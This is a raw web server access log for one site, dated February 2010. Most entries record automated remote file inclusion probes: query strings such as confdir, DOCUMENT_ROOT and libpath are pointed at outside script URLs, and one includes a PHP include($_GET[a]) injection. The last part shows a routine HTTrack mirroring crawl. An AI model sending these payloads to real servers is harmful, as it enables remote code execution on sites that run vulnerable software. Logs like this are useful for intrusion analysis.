80.82.114.106 - - [13/Feb/2010:09:50:49 -0800] "GET /logs/access_100107.log/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:09:50:50 -0800] "GET /logs/access_100117.log/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:09:50:50 -0800] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:09:51:03 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:09:51:03 -0800] "GET /config/dbutil.bck.php?confdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:09:51:03 -0800] "GET /logs/access_100125.log%20%20//config/dbutil.bck.php?confdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:09:51:03 -0800] "GET /logs/access_100130.log%20%20//config/dbutil.bck.php?confdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:09:51:04 -0800] "GET /logs/access_100117.log/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:09:51:04 -0800] "GET /logs/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:09:51:04 -0800] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:51:22 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:51:22 -0800] "GET /logs/access_100103.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:51:22 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:09:51:23 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:09:51:30 -0800] "GET /logs/access_100130.log%20%20//config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:09:51:30 -0800] "GET /config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:09:51:30 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:09:51:30 -0800] "GET /logs/access_100125.log%20%20//config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [13/Feb/2010:09:51:35 -0800] "GET /logs/access_100114.log/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:09:52:04 -0800] "GET /logs/access_100117.log/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:09:52:04 -0800] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:09:52:04 -0800] "GET /logs/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:09:52:07 -0800] "GET /config/dbutil.bck.php?confdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:09:52:07 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:09:52:07 -0800] "GET /logs/access_100125.log%20%20//config/dbutil.bck.php?confdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:09:52:07 -0800] "GET /logs/access_100130.log%20%20//config/dbutil.bck.php?confdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.247.64.12 - - [13/Feb/2010:09:53:38 -0800] "GET /include/write.php?dir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.247.64.12 - - [13/Feb/2010:09:53:38 -0800] "GET /logs//include/write.php?dir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.247.64.12 - - [13/Feb/2010:09:53:38 -0800] "GET /logs/access_100111.log%20%20//include/write.php?dir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:54:49 -0800] "GET /logs/access_100116.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:55:46 -0800] "GET /logs/access_100116.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:55:51 -0800] "GET /logs/access_100105.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:56:02 -0800] "GET /include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:56:02 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:56:02 -0800] "GET /logs/access_100204.log%20%20//include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:09:56:03 -0800] "GET /bbs/move_update.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:09:56:03 -0800] "GET /logs//bbs/move_update.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:09:56:03 -0800] "GET /logs/access_100125.log%20%20//bbs/move_update.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:09:56:15 -0800] "GET /bbs/move_update.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:09:56:15 -0800] "GET /logs//bbs/move_update.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:09:56:15 -0800] "GET /logs/access_100125.log%20%20//bbs/move_update.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [13/Feb/2010:09:56:46 -0800] "GET /logs/access_100105.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.pnic.go.th//pictures/my_file/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:56:52 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:56:52 -0800] "GET /include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:56:52 -0800] "GET /logs/access_100204.log%20%20//include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:56:59 -0800] "GET /logs/access_100204.log%20%20//include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:56:59 -0800] "GET /include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:56:59 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:57:21 -0800] "GET /config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:57:21 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:57:21 -0800] "GET /logs/access_100125.log%20%20//config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:57:39 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:57:39 -0800] "GET /config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:57:39 -0800] "GET /logs/access_100125.log%20%20//config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:57:54 -0800] "GET /logs/access_100130.log%20%20//config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:57:56 -0800] "GET /logs/access_100111.log%20%20//index.php?DOCUMENT_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:57:56 -0800] "GET /logs/access_100119.log%20%20//index.php?DOCUMENT_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:57:56 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:57:58 -0800] "GET /index.php?DOCUMENT_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:58:02 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:58:03 -0800] "GET /index.php?DOCUMENT_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [13/Feb/2010:09:58:15 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sedu.co.kr/sh/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [13/Feb/2010:09:58:18 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sedu.co.kr/sh/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [13/Feb/2010:09:58:18 -0800] "GET /logs/access_100103.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sedu.co.kr/sh/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [13/Feb/2010:09:58:18 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sedu.co.kr/sh/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [13/Feb/2010:09:58:18 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sedu.co.kr/sh/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [13/Feb/2010:09:58:18 -0800] "GET /logs/access_100103.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sedu.co.kr/sh/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [13/Feb/2010:09:58:31 -0800] "GET /logs/access_100130.log%20%20//config/dbutil.bck.php?confdir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [13/Feb/2010:09:58:33 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sedu.co.kr/sh/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.61 - - [13/Feb/2010:09:58:36 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://www.sedu.co.kr/sh/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:58:50 -0800] "GET /logs/access_100117.log%20%20//include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [13/Feb/2010:09:59:29 -0800] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.aslcaserta2.it//idste.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
221.141.1.113 - - [13/Feb/2010:09:59:30 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.aslcaserta2.it//idste.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
221.141.1.113 - - [13/Feb/2010:09:59:30 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.aslcaserta2.it//idste.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
221.141.1.113 - - [13/Feb/2010:09:59:32 -0800] "GET /logs/access_100116.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.aslcaserta2.it//idste.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:09:59:32 -0800] "GET /logs/access_100208.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:09:59:32 -0800] "GET /logs//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:09:59:32 -0800] "GET /errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:09:59:50 -0800] "GET /logs/access_100117.log%20%20//include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:09:59:58 -0800] "GET /logs/access_100107.log/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.247.64.12 - - [13/Feb/2010:10:00:23 -0800] "GET /logs/access_100126.log%20%20//include/write.php?dir=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:10:00:58 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:10:00:58 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:10:01:02 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [13/Feb/2010:10:01:07 -0800] "GET /logs/access_100208.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:08 -0800] "GET / HTTP/1.1" 200 3642 "-" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:08 -0800] "GET /diger HTTP/1.1" 301 90 "-" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:09 -0800] "GET /diger/ HTTP/1.1" 200 3545 "http://www.puaga.com/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:09 -0800] "GET /pictures/ HTTP/1.1" 200 7813 "http://www.puaga.com/diger/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:10 -0800] "GET /blog HTTP/1.1" 404 5258 "http://www.puaga.com/diger/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:11 -0800] "GET /pictures/p3 HTTP/1.1" 301 96 "http://www.puaga.com/diger/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:11 -0800] "GET /pictures/p5 HTTP/1.1" 301 96 "http://www.puaga.com/diger/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:11 -0800] "GET /pictures/p6 HTTP/1.1" 301 96 "http://www.puaga.com/diger/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:12 -0800] "GET /pictures/p7 HTTP/1.1" 301 96 "http://www.puaga.com/diger/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:12 -0800] "GET /pictures/p8 HTTP/1.1" 301 96 "http://www.puaga.com/diger/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:13 -0800] "GET /pictures/p9 HTTP/1.1" 301 96 "http://www.puaga.com/diger/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:13 -0800] "GET /pictures/p11 HTTP/1.1" 301 97 "http://www.puaga.com/diger/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:14 -0800] "GET /login/register.php HTTP/1.1" 200 4989 "http://www.puaga.com/diger/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:15 -0800] "GET /cam/ HTTP/1.1" 200 749 "http://www.puaga.com/diger/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:16 -0800] "GET /new/ HTTP/1.1" 404 5258 "http://www.puaga.com/pictures/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:16 -0800] "GET /pictures/p3/ HTTP/1.1" 302 12592 "http://www.puaga.com/pictures/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:17 -0800] "GET /login/needregister.php HTTP/1.1" 302 5 "http://www.puaga.com/pictures/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:17 -0800] "GET /login/registerError.php HTTP/1.1" 200 6034 "http://www.puaga.com/pictures/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:18 -0800] "GET /pictures/p5/ HTTP/1.1" 302 9773 "http://www.puaga.com/pictures/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:19 -0800] "GET /pictures/p6/ HTTP/1.1" 302 7100 "http://www.puaga.com/pictures/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:19 -0800] "GET /pictures/p7/ HTTP/1.1" 302 7216 "http://www.puaga.com/pictures/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:20 -0800] "GET /pictures/p8/ HTTP/1.1" 302 11319 "http://www.puaga.com/pictures/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:20 -0800] "GET /pictures/p9/ HTTP/1.1" 302 10336 "http://www.puaga.com/pictures/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:21 -0800] "GET /pictures/p11/ HTTP/1.1" 302 34466 "http://www.puaga.com/pictures/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:23 -0800] "GET /ideal/ HTTP/1.1" 200 524 "http://www.puaga.com/pictures/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:23 -0800] "GET /tour/ HTTP/1.1" 404 5258 "http://www.puaga.com/pictures/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:24 -0800] "GET /blog/ HTTP/1.1" 404 5258 "http://www.puaga.com/pictures/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:24 -0800] "GET /labs/ HTTP/1.1" 404 5258 "http://www.puaga.com/pictures/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:25 -0800] "GET /services/ HTTP/1.1" 404 5258 "http://www.puaga.com/pictures/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:25 -0800] "GET /login/ HTTP/1.1" 200 6691 "http://www.puaga.com/pictures/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:27 -0800] "GET /module/view.php?id=services HTTP/1.1" 200 6069 "http://www.puaga.com/pictures/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:27 -0800] "GET /polteaser/ HTTP/1.1" 200 1569 "http://www.puaga.com/pictures/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:28 -0800] "GET /index.php?r=1 HTTP/1.1" 200 3642 "http://www.puaga.com/pictures/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:28 -0800] "GET /pictures/p1/ HTTP/1.1" 302 4597 "http://www.puaga.com/pictures/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:29 -0800] "GET /login HTTP/1.1" 301 90 "http://www.puaga.com/pictures/p3/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
189.115.138.192 - - [13/Feb/2010:10:01:29 -0800] "GET /ideal/?N=D HTTP/1.1" 200 524 "http://www.puaga.com/ideal/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)" "www.puaga.com"
